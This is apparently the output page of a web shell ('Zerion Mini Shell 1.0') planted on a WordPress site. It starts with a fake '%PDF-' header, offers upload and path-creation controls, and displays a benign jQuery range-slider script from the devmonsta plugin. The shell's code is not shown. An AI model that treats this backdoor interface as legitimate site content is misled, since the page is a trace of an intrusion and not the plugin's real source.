%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/19851/cwd/wp-content/plugins/devmonsta/core/options/assets/src/init-scripts/
Upload File :
Create Path :
Current File : //proc/19851/cwd/wp-content/plugins/devmonsta/core/options/assets/src/init-scripts/range-slider.js

jQuery(window).on('devm-scripts.rangeSlider', function(){
    var el = jQuery('.devm-option.active-script .devm-range-slider');
    if (el.length) {
        el.asRange({
            range: true,
            limit: false,
            direction: 'h', // 'v' or 'h'
            keyboard: true,
            tip: true,
            scale: true,
            format(value) {
              return value;
            },
            onChange(instance) {
                jQuery(this)[0].$element.trigger("change");
            }
        }); 
    }

});


jQuery(document).ready(function($) {
    jQuery(window).trigger('devm-scripts.rangeSlider');
});

Zerion Mini Shell 1.0